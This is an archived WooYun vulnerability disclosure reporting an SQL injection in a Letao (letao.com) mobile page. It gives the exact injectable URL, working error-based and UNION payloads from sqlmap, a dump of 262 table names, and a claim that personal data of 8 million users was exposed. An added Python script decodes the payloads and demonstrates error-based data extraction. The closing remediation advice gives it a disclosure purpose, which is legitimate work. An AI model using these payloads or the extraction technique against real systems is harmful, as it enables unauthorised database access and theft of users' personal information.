WooYun (WooYun.org) historical vulnerability archive---http://wy.zone.ci/
WooYun Drops articles, online reader--------http://drop.zone.ci/
2015-09-15: Details reported to the vendor; awaiting vendor handling.
2015-09-20: Vendor has actively ignored the vulnerability; details disclosed to the public.
SQL injection on a Letao (乐淘网, letao.com) site involving the information of 8 million users
Injection point: http://wep.letao.com/wap/app_download.aspx?bid=12*&op=brand (the trailing * on bid is sqlmap's marker for the parameter to inject into)
262 tables involved
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: http://wep.letao.com:80/wap/app_download.aspx?bid=12 AND 9010=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(112)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (9010=9010) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(98)+CHAR(113)))&op=brand

    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: http://wep.letao.com:80/wap/app_download.aspx?bid=12 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(122)+CHAR(112)+CHAR(113)+CHAR(113)+CHAR(104)+CHAR(108)+CHAR(86)+CHAR(83)+CHAR(109)+CHAR(70)+CHAR(72)+CHAR(112)+CHAR(119)+CHAR(112)+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(98)+CHAR(113),NULL,NULL-- &op=brand
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
Database: letaoerp
[262 tables]
+------------------------------------+
| Addressee |
| BRAND_TECH |
| BRAND_TECH |
| CH_ACCOUNT_BALANCE |
| CH_BOX_ORDER_DETAIL |
| CH_BOX_ORDER_DETAIL |
| CH_LOG |
| CH_RETURN_ORDER_DETAIL |
| CH_RETURN_ORDER_DETAIL |
| CH_RETURN_ORDER_RECORD |
| CH_SELL_ORDER_ADJUST |
| CH_SELL_ORDER_ADJUST |
| CH_SELL_ORDER_DETAIL |
| CH_SELL_ORDER_RECORD |
| CH_SELL_SCHEDULE_ORDER_DETAIL |
| CH_SELL_SCHEDULE_ORDER_DETAIL |
| CH_SHIP_ORDER_DETAIL |
| CH_SHIP_ORDER_DETAIL |
| CmsContent |
| Dealer |
| ERP_ADDR_AREA |
| ERP_ADDR_CITY |
| ERP_ADDR_PROVINCE |
| ERP_AD_DEFINE |
| ERP_AD_PLAN |
| ERP_ARTICLE_CONTENT |
| ERP_ARTICLE_CONTENT |
| ERP_ARTICLE_TYPE |
| ERP_BANK_BANK_CODE |
| ERP_BANK_BRANCH_LIST |
| ERP_BANK_CITY_LIST |
| ERP_BAOSHENG_STOCK |
| ERP_CHANNEL_PROMOTION_TABLE |
| ERP_COUPAN_BATCH |
| ERP_COUPAN_CAMPAIGN |
| ERP_COUPAN_EXCEPTION |
| ERP_COUPAN_RECORD |
| ERP_COUPAN_SECTION |
| ERP_COUPAN_USER_ALLOCATED |
| ERP_COUPON_DANPINPAI_LIST |
| ERP_COUPON_DANPIN_LIST |
| ERP_CO_PAY_RECORD_ONLINE |
| ERP_CO_REFUND_ORDER |
| ERP_CO_REJECT_ORDER |
| ERP_CUSTOMER |
| ERP_DEALER_PRODUCT_LIST |
| ERP_DEALER_STOCK_EXCEPTION |
| ERP_DEALER_STOCK_LIST |
| ERP_DEFECT_WARE_DETAIL |
| ERP_DEFECT_WARE_DETAIL |
| ERP_EDM_BATCH_SEND |
| ERP_EDM_UNSUBSCRIBER |
| ERP_EXPRESS_CONTRACT |
| ERP_EXPRESS_FORM_DEFINE |
| ERP_GIFT_CARD_DEFINE |
| ERP_GIFT_CARD_RECORD |
| ERP_INVENTORY_DIFFERENCE |
| ERP_INVENTORY_DIFF_ADJUST |
| ERP_INVENTORY_DIFF_ADJUST |
| ERP_INVENTORY_RESULT2 |
| ERP_INVENTORY_RESULT2 |
| ERP_INVENTORY_SCAN |
| ERP_INVENTORY_TASK |
| ERP_IPHONE_MESSAGE |
| ERP_InvitePraise_For_TaoBao |
| ERP_JOB |
| ERP_JUSHOU_INFO |
| ERP_KEYWORD_TRANSFER |
| ERP_MARKET_LIBAO |
| ERP_MARKET_ORDERGIFT |
| ERP_MARKET_PRODUCTGIFT |
| ERP_MARKET_URL |
| ERP_MATERIAL_APPLY_DETAIL |
| ERP_MATERIAL_APPLY_DETAIL |
| ERP_MATERIAL_DEALER |
| ERP_MATERIAL_ORDER |
| ERP_MATERIAL_PURCHASE_DETAIL |
| ERP_MATERIAL_PURCHASE_DETAIL |
| ERP_MATERIAL_STAT |
| ERP_MATERIAL_STOCK |
| ERP_MATERIAL_TRANSFER_DETAIL |
| ERP_MATERIAL_TRANSFER_DETAIL |
| ERP_MIAOSHA |
| ERP_MILK_API_LOG |
| ERP_MILK_APP_CONFIG |
| ERP_MOBILE_CATEGORY_CMS |
| ERP_MOBILE_MIAOSHA_V2_DETAIL |
| ERP_MOBILE_MIAOSHA_V2_DETAIL |
| ERP_MOBILE_MIAOSHA_V2_DETAIL |
| ERP_MOBILE_SMS_BATCH_SEND |
| ERP_MiniSite_CSS |
| ERP_MiniSite_PageSource |
| ERP_MiniSite_Page_CSS |
| ERP_MiniSite_Page_Script |
| ERP_MiniSite_Script |
| ERP_NEARESST_DELIVERY |
| ERP_ONTHEHOUR_COUPAN |
| ERP_OP_ITEM_LOCK |
| ERP_OP_ITEM_LOG |
| ERP_ORDER_NOTIFY_HISTORY |
| ERP_ORDER_NOTIFY_HISTORY |
| ERP_PHONE_LOG |
| ERP_PHONE_NAMELOG |
| ERP_PO_SHIP_ORDER_DETAIL |
| ERP_PO_SHIP_ORDER_DETAIL |
| ERP_PRICE_FORMULA |
| ERP_PRODUCT_CATEGORY_DEFINE |
| ERP_PRODUCT_CHANGELOG |
| ERP_PRODUCT_DISCOUNT_DEFINE |
| ERP_PRODUCT_PRICE_MANAGER |
| ERP_PRODUCT_PROPERTIES |
| ERP_PRODUCT_PROPERTY_DEFINE |
| ERP_PROD_PRICE_CHANGELOG |
| ERP_PROMOTION_CATEGORY_LINK |
| ERP_PROMOTION_CATEGORY_LINK |
| ERP_PROMOTION_LIST |
| ERP_PROMOTION_PRICE_FORMULA |
| ERP_PROMOTION_PRODUCT |
| ERP_PURCHASE_DEFER_ORDER |
| ERP_PURCHASE_IMG |
| ERP_PURCHASE_ORDER_DETAIL |
| ERP_PURCHASE_ORDER_DETAIL |
| ERP_ProductOnlyCode |
| ERP_QQ_COUPAN_MAP_TABLE |
| ERP_QUE_TUI_HUO_RECORD |
| ERP_RECEIPT_ORIGINAL |
| ERP_RESTORE |
| ERP_RETURN_BY_EXPRESS_DETAIL |
| ERP_RETURN_BY_EXPRESS_DETAIL |
| ERP_RETURN_BY_EXPRESS_PROVINCE |
| ERP_RETURN_ORDER |
| ERP_RO_RESERVE_PROD_DETAIL |
| ERP_SALES_ORDER_DETAIL |
| ERP_SALES_ORDER_DETAIL |
| ERP_SALES_PREDICTION_BASE |
| ERP_SEM_KEYWORD_LIB |
| ERP_SEM_PROD_SKU_LIST |
| ERP_SEO_CHANEL_CLASS_URL |
| ERP_SEO_CHANEL_LEXICON |
| ERP_SEO_CHANEL_PAGE_CLASS |
| ERP_SEO_CHANEL_PAGE_KEY |
| ERP_SHIPPING_RECORD_DETAIL |
| ERP_SHIPPING_RECORD_DETAIL |
| ERP_SHOE_BRAND_SIZE_TABLE |
| ERP_SITE_MESSAGE |
| ERP_SITE_TEMPLATE_CMS |
| ERP_SO_BANKINFO |
| ERP_SO_BATCH |
| ERP_SO_DE_PRICE_DETAIL |
| ERP_STOCK_MAIN |
| ERP_STOCK_PICKUP_FORM_DETAIL |
| ERP_STOCK_PICKUP_FORM_DETAIL |
| ERP_STOCK_PROD_MOVE_DETAIL |
| ERP_STOCK_PROD_MOVE_DETAIL |
| ERP_STOCK_RETURN_DEALER_FORM |
| ERP_STOCK_RETURN_DEALER_RECORD |
| ERP_STOCK_SHELF_DEFINE |
| ERP_STOCK_TRANSFER |
| ERP_STOCK_UPC |
| ERP_STOCK_UPLOADSHELF_DETAIL |
| ERP_STOCK_UPLOADSHELF_FORM |
| ERP_ShippingTimeOutRule |
| ERP_TALLY_DIFFERENCE |
| ERP_TALLY_SCAN |
| ERP_TALLY_TASK_DETAIL |
| ERP_TALLY_TASK_DETAIL |
| ERP_TRANSFER_RULE |
| ERP_TUANGOU |
| ERP_Tie_Shoes_Method |
| ERP_Tie_Shoes_Step |
| ERP_UNION_LMWL_LIB |
| ERP_UNION_LMWL_LIB |
| ERP_UNION_NOTITY |
| ERP_UNION_PRE_REGISTER |
| ERP_UNION_STEP_RATIO |
| ERP_USERS |
| ERP_USER_ADMIN_LOG |
| ERP_USER_BIND_UNION_TABLE |
| ERP_USER_BLACKLIST |
| ERP_USER_COMMENT |
| ERP_USER_IP_RESTRICTION |
| ERP_USER_LOGIN_LOG |
| ERP_USER_WUYOU_CARD_LOG |
| ERP_USER_WUYOU_CARD_LOG |
| ERP_WAREHOUSE_PART |
| ERP_WAREHOUSE_PRINTER_SETTING |
| ERP_WEIBO_ERROR |
| ERP_WEIBO_KEYWORD |
| ERP_WEIBO_MESSAGE_LOG |
| ERP_WEIBO_MESSAGE_LOG |
| ERP_WORK_ORDER_BEFOREREFUND_DETAIL |
| ERP_WORK_ORDER_BEFOREREFUND_DETAIL |
| ERP_WORK_ORDER_CALLIN_DETAIL |
| ERP_WORK_ORDER_DETAIL |
| ERP_WORK_ORDER_EXPRESS |
| ERP_WORK_ORDER_LOG |
| ERP_WORK_ORDER_PHONE_LOG |
| ERP_WORK_ORDER_PORC_DETAIL |
| ERP_WORK_ORDER_RETURN_DETAIL |
| ERP_WORK_ORDER_STAFF_ONLINE_LOG |
| ERP_WORK_ORDER_TYPE_TIME_SET |
| ERP_WORK_ORDER_UNUSUAL_DETAIL |
| ERP_WORK_ORDER_UPGRADE_DETAIL |
| ERP_WORK_ORDER_UPGRADE_STAT_DETAIL |
| ERP_WorkOrder_Group_Member |
| ERP_WorkOrder_Group_Member |
| EXPRESS_COMPANY_USER |
| EXPRESS_DISTRIBUTE_RULE |
| Erp_tie_shoes_posterDes |
| ExpressCompany |
| FREE_TUAN_ORDER_DETAIL |
| FREE_TUAN_ORDER_FORM |
| INVOICE_PRINT |
| INVOICE_PRINT |
| Image |
| ORDER_COUPAN_RELATIONS |
| OrderDetail |
| OrderForm |
| OrderStatus |
| PRODUCT_BRAND_TECH_MAP |
| PRODUCT_BRAND_TECH_MAP |
| PROMO_SETTING |
| Payments |
| Po_Detail |
| ProdComment |
| ProductPresellDetail |
| ProductPresellDetail |
| Product_Style |
| PurChase_Order |
| SHIPPING_EXPENSE_RULE |
| SHIPPING_EXPENSE_RULE |
| SHIP_ORDER_DETAIL |
| SITE_SOURCE_BIND_TALBE |
| STOCK_BASE |
| STOCK_LOG |
| Shipping_Order |
| Storehouse |
| Third_Part_Logistics_Cost |
| Third_Part_Order_Syn |
| Third_Part_Sales_Prom_Detail |
| Third_Part_Sales_Prom_Detail |
| Third_Part_Sales_Prom_Log |
| Third_Part_Shop_Product |
| Transfer |
| UNION_PAPERS_IMG |
| UNION_PROMOTION |
| UN_Member |
| UN_S_Member |
| UN_School |
| USER_BLACKLIST |
| USER_UNION_BIND_TABLE |
| UnionIp |
| Union_Keys |
| UserCMS |
| Users |
| VIRTUAL_ACCOUNT_DETAIL |
| VIRTUAL_ACCOUNT_DETAIL |
| aa_neigou |
| erp_temp_order_commetnt |
| erp_temp_product |
| erp_temp_users |
| sysdiagrams |
+------------------------------------+
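The two sqlmap payloads above are hard to read because every string literal is spelled as a CHAR(n)+CHAR(n)+... chain, a T-SQL trick for writing a string without quote characters. The example below is added here and is not part of the original report or of sqlmap: it decodes both payloads exactly as quoted, recovers the random boundary strings sqlmap wraps around the value it wants to read, and shows how error-based extraction pulls that value out of the SQL Server conversion error (Msg 245) that CONVERT(INT, '<non-numeric>') raises. The HTTP error bodies in the block are constructed to match that message's wording and were not captured from the target; the database name letaoerp is the one the report lists.

```python
import re

# Added example for this write-up (not part of the original report or of
# sqlmap itself). The HTTP responses below are constructed, modelled on the
# ASP.NET error page that surfaces SQL Server's Msg 245; nothing here was
# captured from the target.

# Payload bodies exactly as quoted in the sqlmap output, with the URL stripped.
ERROR_BASED_PAYLOAD = (
    "12 AND 9010=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(112)+CHAR(113)+CHAR(113)"
    "+(SELECT (CASE WHEN (9010=9010) THEN CHAR(49) ELSE CHAR(48) END))"
    "+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(98)+CHAR(113)))"
)
UNION_PAYLOAD = (
    "12 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(122)+CHAR(112)+CHAR(113)"
    "+CHAR(113)+CHAR(104)+CHAR(108)+CHAR(86)+CHAR(83)+CHAR(109)+CHAR(70)+CHAR(72)"
    "+CHAR(112)+CHAR(119)+CHAR(112)+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(98)+CHAR(113)"
    ",NULL,NULL-- "
)

# One or more CHAR(n) calls joined with '+': a string literal with no quotes,
# which sidesteps naive quote filtering in the app or a WAF.
CHAR_CHAIN = re.compile(r"CHAR\(\d+\)(?:\+CHAR\(\d+\))*")


def decode_char_chain(chain: str) -> str:
    """'CHAR(113)+CHAR(122)' -> 'qz'. T-SQL CHAR(n) yields one single-byte character."""
    return "".join(chr(int(n)) for n in re.findall(r"CHAR\((\d+)\)", chain))


def decode_payload(payload: str) -> str:
    """Rewrite every CHAR() chain as a quoted literal so the injected SQL reads
    the way the database engine sees it."""
    return CHAR_CHAIN.sub(lambda m: "'" + decode_char_chain(m.group(0)) + "'", payload)


# sqlmap brackets the value it wants to read between two random boundary
# strings so it can locate it anywhere in the response. These are the ones
# that appear, CHAR-encoded, at the start and end of both payloads above.
PREFIX = decode_char_chain("CHAR(113)+CHAR(122)+CHAR(112)+CHAR(113)+CHAR(113)")  # 'qzpqq'
SUFFIX = decode_char_chain("CHAR(113)+CHAR(113)+CHAR(107)+CHAR(98)+CHAR(113)")   # 'qqkbq'


def extract_between_markers(response: str, prefix: str = PREFIX, suffix: str = SUFFIX):
    """Return the text enclosed by the boundary strings in a response, or None.

    CONVERT(INT, <non-numeric string>) makes SQL Server raise Msg 245 and echo
    the offending string inside the message; when the application renders the
    exception, the bracketed value comes back in the HTTP body.
    """
    m = re.search(re.escape(prefix) + r"(.*?)" + re.escape(suffix), response, re.S)
    return m.group(1) if m else None


def probe_is_true(response: str) -> bool:
    """The CASE in the error-based payload yields '1' when its condition holds
    and '0' otherwise; sqlmap uses this to confirm the injection before reading data."""
    return extract_between_markers(response) == "1"


# Constructed responses (not captured from the target).
PROBE_RESPONSE = (
    "Server Error in '/' Application.\n"
    "Conversion failed when converting the varchar value 'qzpqq1qqkbq' "
    "to data type int."
)
# What the same channel returns once the CASE subquery is swapped for DB_NAME().
DBNAME_RESPONSE = (
    "Server Error in '/' Application.\n"
    "Conversion failed when converting the varchar value 'qzpqqletaoerpqqkbq' "
    "to data type int."
)
CLEAN_RESPONSE = "<html><body>Download our app</body></html>"


if __name__ == "__main__":
    print(decode_payload(ERROR_BASED_PAYLOAD))
    print(decode_payload(UNION_PAYLOAD))
    print("probe true:", probe_is_true(PROBE_RESPONSE))
    print("leaked DB name:", extract_between_markers(DBNAME_RESPONSE))
    print("clean page leaks:", extract_between_markers(CLEAN_RESPONSE))
```

Decoding shows the UNION payload placing a single tagged literal in column 6 of 8, which is how sqlmap finds a column that the page echoes, and the error-based payload wrapping a one-character CASE result in the same boundaries. Any value that can be selected as a string can be substituted for that CASE, which is why one unauthenticated GET parameter was enough to enumerate the 262 tables listed above; the durable fix is a parameterised query for bid, with detailed SQL exceptions disabled on the production site so the error channel closes as well.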
8 million users
Fields include email address, mobile number, real name, username, password and others.
Severity: No impact (vendor ignored)
Ignored at: 2015-09-20 19:32
Vulnerability Rank: 15 (WooYun rating)
Vendor response: none yet